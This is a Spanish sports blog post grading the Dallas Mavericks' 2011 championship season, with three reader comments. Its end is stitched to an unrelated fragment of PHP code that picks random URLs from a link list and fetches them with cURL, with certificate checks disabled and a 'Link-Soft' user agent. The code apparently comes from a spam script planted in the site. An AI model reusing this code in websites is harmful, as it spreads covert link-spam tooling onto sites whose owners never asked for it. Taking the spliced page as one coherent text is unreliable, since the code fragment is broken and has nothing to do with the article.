Dallas Mavericks: Sobresaliente

18 de July de 2011 por TheDeerHunter

Es de Perogrullo. Obvio que el campeón se iba a llevar nuestro último sobresaliente.

En Dallas llevan celebrando su particular Navidad desde el 12 de Junio y es casi imposible añadir nada que no se haya dicho desde entonces. Uno no deja de maravillarse con lo que ha ocurrido allí este año. No es sólo el éxito final, son las formas. Releo los análisis que hicimos al comienzo de la campaña y reflexiono tratando de unir los puntos que han trazado este camino. Sinceramente después de un mes no terminamos de creerlo, mucho menos de explicarlo. Quizás sea eso lo más alucinante de todo.

¿Cómo se logra un anillo? Veamos. Los nombres de Carlisle, Nowitzki, Kidd, Terry, Stojakovic, Butler, Chandler, Marion, Haywood, Stevenson, Cardinal, Brewer… eran ilustres en la liga, pero no precisamente por ganar campeonatos sino más bien por lo contrario. No se trata de jóvenes talentos que de repente eclosionan sino que su mejor estado de forma hace tiempo que quedó atrás. Los buenos vinos mejoran con los años, aunque claro, ninguno de ellos tiene que echarle una carrerita o ponerle un tapón a LeBron James.

Para empezar yo diría que tiene un poco de eso. Que no envejece bien quien quiere sino quien puede y a base de todos esos retales se habían juntado muy buenos ingredientes para el caldo. Pero es que podemos achacar a ese factor el que Nowitzki nos deslumbre sólo desde la inteligencia y talento o que Jason Kidd sea letal desde el triple tras 17 años en la liga, pero no el que Carlisle pase de la noche a la mañana de ser uno de los técnicos más barraqueros de la conferencia Este a recordar a los Kings “yé-yé” con un juego de pase maravilloso. Tampoco que Chandler pase de no valer para los Bobcats y ser considerado “contrato nocivo” a ser la pieza exacta que les faltaba, o que haya sido el pequeñito Barea el par adecuado para hacerle daño a Wade… Hablamos de un importante factor casualidad, que no de suerte, porque si les hubiera acompañado esta hubieramos visto a Caron Butler de titular durante todo el camino recorrido (¿hubiera mejorado el resultado?). Hablamos de que directa o indirectamente se ha logrado acertar en todo.

Esta, pues, sería la receta del campeón. No descubro nada nuevo: 1) Contar con buenos mimbres. 2) Hacer las cosas bien en la medida de lo posible. Buscar la fortuna. 3) Encontrarla. 4) Que los demás no la tengan. Tan sencillo como eso. Vale por un anillo.

Lo mejor: Que desde Larry Bird no habíamos visto una exhibición de un jugador blanco como la que nos ha ofrecido Dirk y algunos ya habíamos perdido las esperanzas de volver a ver algo así. La mutación de Carlisle y el increíble nivel de juego que ha obtenido de sus jugadores. El tatuaje de Jason Terry. La grandeza eterna de Jason Kidd. El año de Tyson Chandler. La actuación final de Barea. La barrida a los Lakers… Un largo etcétera a partir de aquí.

Lo peor: La lesión de Butler. La pésima racha de derrotas al inicio de 2011 (3-10). Que los años pasan incluso para los mejores. Que Cardinal tiene un anillo y otros no.

Jugando a GM

– Renovar por lo civil o por lo criminal a Tyson Chandler. Los Mavericks tienen una obligación moral de hacerlo, pero también él debería tener obligación moral de aflojar pretensiones. Como en Dallas no va a estar en ningún sitio por mucho que le paguen.

– Mucho me temo que hay que renunciar a Barea y también a Caron Butler. Por descontado también a Stevenson, Cardinal y Stojakovic. Como mucho me quedaría con el primero de estos tres si no pidiera mucho.

– Refrescar el perímetro. Si Haywood y Brewer no son del agrado de Carlisle como así parece ser podrían ser buenas monedas de cambio para ello. Creo que todavía cuentan con cierto cartel a pesar de todo.

– En la misma línea los Mavericks parecen el sueño de los veteranos y más si hay promesa de anillo incluida. Me vienen a la mente varios agentes libres que podrían encajar a las maravillas en este contexto (Prince, Battier, Hill, Pietrus, Josh Howard… ¿McGrady?)

Comenta

3 comentarios a esta entrada

  1. Lanegan dice:
    #1

    La nota debería ser Matricula de Honor, no es justo que tengan la misma valoracion que Miami, Menphis o Chicago.

      Citar

  2. Blade Petrovic dice:
    #2

    Para mi la clave es la profundidad de banquillo y es que todos los años hacían buenas regular season pero les faltavan los playoofs y este año lo han conseguido.GO mavs

      Citar

  3. Rompe dice:
    #3

    A pesar de Cuban, creo que es uno de los equipos que mejor cae de la competición, por la cantidad de ilustres que ya habíamos aceptado que no conseguirían un anillo…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>